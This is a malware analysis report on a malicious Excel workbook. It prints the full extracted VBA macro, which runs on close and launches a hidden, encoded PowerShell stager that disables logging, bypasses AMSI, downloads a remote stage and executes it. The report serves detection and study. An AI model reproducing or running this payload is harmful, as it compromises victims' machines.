Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c38acd9f5e114a4f…

MALICIOUS

Office (OOXML)

Size: 18.7 KB · Created: 2021-04-05 10:01:50 UTC · Authoring application: Microsoft Excel 16.0300 · First seen: 2021-07-10
MD5: f754559f862674fcf84b4dea7ea0a093
SHA-1: 50adddf88c5b4bd6689ac80a0ac1e5436f9b781b
SHA-256: c38acd9f5e114a4f7f875b72b77e3a80a37758ef5186918bbd6dc6f1625bc8d9
Risk score: 228

Heuristics (6)

  • VBA project inside OOXML — medium — 5 related findings — OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage — critical — OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        NR = NR + "AoACQASQBWACsAJABLACkAKQB8AEkARQBYAA=="
        Set asd = CreateObject("WScript.Shell")
        asd.Run (NR)
  • PowerShell reference in VBA — critical — OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        Dim NR As String
        NR = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
        NR = NR + "BFAFIAUwBJAG8AbgBUAGEAYgBMAGUALgBQAFMAVgBFAHIAcwBp"
  • CreateObject call — high — OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        NR = NR + "AoACQASQBWACsAJABLACkAKQB8AEkARQBYAA=="
        Set asd = CreateObject("WScript.Shell")
        asd.Run (NR)
  • VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) / cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule catches p-code-only macro documents, and documents whose source extraction failed, where no readable source is available.
  • Auto_Close macro — low — OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Attribute VB_Name = "Module1"
    Sub AutoClose()
        ptp

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7729 bytes
SHA-256: 560e1ea09c943a4e76dc83670cf06dc7a24bab931c01790c8936cc8193e5a4b5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub AutoClose()
    ' [analyst note] Auto-execution entry point (flagged by OLE_VBA_AUTOCLOSE): the
    ' macro fires when the workbook is closed rather than on open, which sidesteps a
    ' casual "open and look" check. Its only action is to call ptp() below.
    ptp
End Sub

Public Function ptp() As Variant
    ' [analyst note] Assembles one PowerShell command line in NR and launches it.
    ' The function never assigns a return value; it exists purely for this side effect.
    Dim NR As String
    ' [analyst note] Switches: -noP (no profile), -sta, -w 1 (hidden window), -enc
    ' (the remainder is base64 of a UTF-16LE script). The payload is split across
    ' ~100 string concatenations, most likely to defeat naive string matching on the
    ' VBA source. The leading chunk decodes to "If($PSV…" (a PowerShell version
    ' check); the final chunk (last NR line) decodes to "…)|IEX", i.e. the
    ' decoded data is piped to Invoke-Expression. A full decode should be confirmed
    ' in a sandbox before relying on further details.
    NR = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
    NR = NR + "BFAFIAUwBJAG8AbgBUAGEAYgBMAGUALgBQAFMAVgBFAHIAcwBp"
    NR = NR + "AE8AbgAuAE0AQQBqAE8AUgAgAC0AZwBlACAAMwApAHsAJAA4AD"
    NR = NR + "IAMgA9AFsAUgBlAEYAXQAuAEEAcwBTAGUAbQBCAGwAeQAuAEcA"
    NR = NR + "ZQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ"
    NR = NR + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBV"
    NR = NR + "AHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAGkARQBgAGwARAAiAC"
    NR = NR + "gAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkA"
    NR = NR + "UwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQ"
    NR = NR + "BiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAA4"
    NR = NR + "ADIAMgApAHsAJAAxADkAMQA9ACQAOAAyADIALgBHAGUAVABWAE"
    NR = NR + "EAbAB1AEUAKAAkAG4AdQBMAGwAKQA7AEkARgAoACQAMQA5ADEA"
    NR = NR + "WwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZw"
    NR = NR + "BnAGkAbgBnACcAXQApAHsAJAAxADkAMQBbACcAUwBjAHIAaQBw"
    NR = NR + "AHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAF"
    NR = NR + "sAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwA"
    NR = NR + "bwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAAxADkAMQ"
    NR = NR + "BbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBn"
    NR = NR + "AGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAH"
    NR = NR + "AAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8A"
    NR = NR + "ZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAYQBsAD0AWwBDAE8AbA"
    NR = NR + "BsAEUAQwBUAEkATwBOAHMALgBHAGUAbgBFAHIASQBjAC4ARABJ"
    NR = NR + "AEMAVABpAE8AbgBhAFIAeQBbAHMAVABSAGkAbgBHACwAUwBZAF"
    NR = NR + "MAVABlAE0ALgBPAEIASgBFAGMAVABdAF0AOgA6AE4AZQBXACgA"
    NR = NR + "KQA7ACQAdgBBAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUw"
    NR = NR + "BjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBu"
    NR = NR + "AGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQARAAoACcARQBuAG"
    NR = NR + "EAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8A"
    NR = NR + "YwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJA"
    NR = NR + "AxADkAMQBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBD"
    NR = NR + "AEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAG"
    NR = NR + "MAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQA"
    NR = NR + "bwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQ"
    NR = NR + "BwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBd"
    NR = NR + "AD0AJAB2AGEAbAB9AEUAbABTAGUAewBbAFMAYwBSAEkAUAB0AE"
    NR = NR + "IATABPAGMAawBdAC4AIgBHAGUAdABGAEkAZQBgAEwAZAAiACgA"
    NR = NR + "JwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbw"
    NR = NR + "BuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBl"
    NR = NR + "AFQAVgBBAGwAVQBlACgAJABuAFUAbABMACwAKABOAGUAdwAtAE"
    NR = NR + "8AYgBqAEUAYwBUACAAQwBPAEwAbABlAEMAdABpAE8AbgBTAC4A"
    NR = NR + "RwBFAE4AZQBSAGkAYwAuAEgAQQBTAGgAUwBlAFQAWwBTAFQAcg"
    NR = NR + "BJAE4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBmAF0ALgBB"
    NR = NR + "AFMAcwBlAE0AQgBMAHkALgBHAGUAdABUAHkAUABlACgAJwBTAH"
    NR = NR + "kAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUA"
    NR = NR + "dABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQ"
    NR = NR + "BsAHMAJwApADsAJABSAEUARgAuAEcARQB0AEYAaQBlAEwARAAo"
    NR = NR + "ACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkAC"
    NR = NR + "cALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMA"
    NR = NR + "JwApAC4AUwBFAFQAVgBhAGwAdQBlACgAJABuAFUAbABMACwAJA"
    NR = NR + "BUAFIAdQBlACkAOwB9ADsAWwBTAFkAUwB0AGUAbQAuAE4AZQB0"
    NR = NR + "AC4AUwBlAHIAVgBJAGMAZQBQAE8AaQBOAFQATQBhAG4AYQBnAE"
    NR = NR + "UAcgBdADoAOgBFAHgAcABlAGMAdAAxADAAMABDAE8AbgBUAEkA"
    ' [analyst note] The chunks starting here decode to
    ' "$566=NEW-OBJEct SyStEM.NEt.WEBClIENt;" — a System.Net.WebClient instance,
    ' i.e. the script performs its own HTTP(S) retrieval (confirm by full decode).
    NR = NR + "bgB1AGUAPQAwADsAJAA1ADYANgA9AE4ARQBXAC0ATwBCAEoARQ"
    NR = NR + "BjAHQAIABTAHkAUwB0AGUATQAuAE4ARQB0AC4AVwBFAEIAQwBs"
    NR = NR + "AEkARQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC"
    NR = NR + "4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsA"
    NR = NR + "IABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMA"
    NR = NR + "A7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBj"
    NR = NR + "AGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AHQALgBFAG"
    NR = NR + "4AQwBPAGQASQBOAEcAXQA6ADoAVQBOAGkAYwBPAEQAZQAuAEcA"
    NR = NR + "RQB0AFMAdAByAEkAbgBnACgAWwBDAG8AbgB2AGUAUgB0AF0AOg"
    NR = NR + "A6AEYAUgBPAG0AQgBBAFMARQA2ADQAUwBUAHIAaQBuAGcAKAAn"
    NR = NR + "AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AE"
    NR = NR + "EAeABBAEQAYwBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB1AEEA"
    NR = NR + "RABFAEEATQBBAEEAdQBBAEQASQBBAE8AZwBBAHgAQQBEAEkAQQ"
    NR = NR + "BNAHcAQQAwAEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBh"
    NR = NR + "AGQAbQBpAG4ALwBnAGUAdAAuAHAAaABwACcAOwAkADUANgA2AC"
    NR = NR + "4ASABFAGEARABlAHIAUwAuAEEAZABkACgAJwBVAHMAZQByAC0A"
    NR = NR + "QQBnAGUAbgB0ACcALAAkAHUAKQA7ACQANQA2ADYALgBQAFIAbw"
    NR = NR + "B4AFkAPQBbAFMAeQBTAHQAZQBNAC4ATgBFAFQALgBXAGUAYgBS"
    NR = NR + "AGUAcQBVAGUAUwBUAF0AOgA6AEQARQBGAGEAdQBMAHQAVwBlAE"
    NR = NR + "IAUABSAG8AWAB5ADsAJAA1ADYANgAuAFAAUgBvAHgAeQAuAEMA"
    NR = NR + "cgBlAGQAZQBuAHQAaQBhAEwAcwAgAD0AIABbAFMAWQBTAHQARQ"
    NR = NR + "BNAC4ATgBlAFQALgBDAFIAZQBEAGUATgBUAGkAQQBsAEMAQQBj"
    NR = NR + "AEgARQBdADoAOgBEAEUAZgBhAFUATABUAE4ARQBUAFcATwBSAE"
    NR = NR + "sAQwBSAGUARABlAG4AdABpAEEATABzADsAJABTAGMAcgBpAHAA"
    NR = NR + "dAA6AFAAcgBvAHgAeQAgAD0AIAAkADUANgA2AC4AUAByAG8AeA"
    NR = NR + "B5ADsAJABLAD0AWwBTAFkAcwB0AEUAbQAuAFQARQBYAHQALgBF"
    NR = NR + "AE4AYwBPAGQAaQBOAEcAXQA6ADoAQQBTAEMASQBJAC4ARwBFAF"
    NR = NR + "QAQgB5AHQAZQBzACgAJwBCAE8AagBQAFgAKwBLAEoALwA+AD0A"
    NR = NR + "bAAuAFEANABxAHcAJQBFADgAegBEAHkAbQByACYAVwBeAGQAPA"
    NR = NR + "BBAEgAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBn"
    NR = NR + "AFMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AH"
    NR = NR + "wAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsA"
    NR = NR + "WwAkAF8AJQAkAEsALgBDAG8AdQBuAFQAXQApACUAMgA1ADYAOw"
    NR = NR + "AkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABK"
    NR = NR + "AF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9AC"
    NR = NR + "gAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQA"
    NR = NR + "UwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJA"
    NR = NR + "BTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBd"
    NR = NR + "ADsAJABfAC0AQgBYAG8AcgAkAFMAWwAoACQAUwBbACQASQBdAC"
    NR = NR + "sAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAA1ADYA"
    NR = NR + "NgAuAEgARQBBAGQAZQBSAHMALgBBAGQAZAAoACIAQwBvAG8Aaw"
    NR = NR + "BpAGUAIgAsACIAVQB4AHQAZQBtAGcAZABJAGcATQA9AFUASABF"
    NR = NR + "AHgALwBuAHAAMQBYAGwANABTAHAASgBaAG0AUgAyAFUANwByAG"
    NR = NR + "8AMwBrAHYAUQAwAD0AIgApADsAJABEAEEAdABhAD0AJAA1ADYA"
    ' [analyst note] This chunk decodes to "6.DowNlOaDDatA(" — the WebClient
    ' DownloadData call that fetches the next stage; this is the "download" token
    ' referenced by the OLE_VBA_PCODE_AUTOEXEC_EXEC finding.
    NR = NR + "NgAuAEQAbwB3AE4AbABPAGEARABEAGEAdABBACgAJABzAEUAUg"
    NR = NR + "ArACQAdAApADsAJABpAFYAPQAkAGQAQQB0AEEAWwAwAC4ALgAz"
    NR = NR + "AF0AOwAkAEQAYQB0AEEAPQAkAEQAYQB0AGEAWwA0AC4ALgAkAE"
    NR = NR + "QAYQB0AGEALgBsAEUAbgBHAHQASABdADsALQBKAE8ASQBuAFsA"
    NR = NR + "QwBoAEEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAQQBUAGEAIA"
    NR = NR + "AoACQASQBWACsAJABLACkAKQB8AEkARQBYAA=="
    ' [analyst note] Launch via WScript.Shell.Run — the hook for the OLE_VBA_WSCRIPT and
    ' OLE_VBA_CREATEOBJ findings. For detection: a powershell.exe child of the Office
    ' host (likely EXCEL.EXE, given the authoring application and the ThisWorkbook
    ' module) with a -enc argument on the command line.
    Set asd = CreateObject("WScript.Shell")
    asd.Run (NR)
End Function


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 24064 bytes
SHA-256: 7d31de6d4b0f39012ce59348177fa68bdcf0e7da3100dd403db9c1feede3539d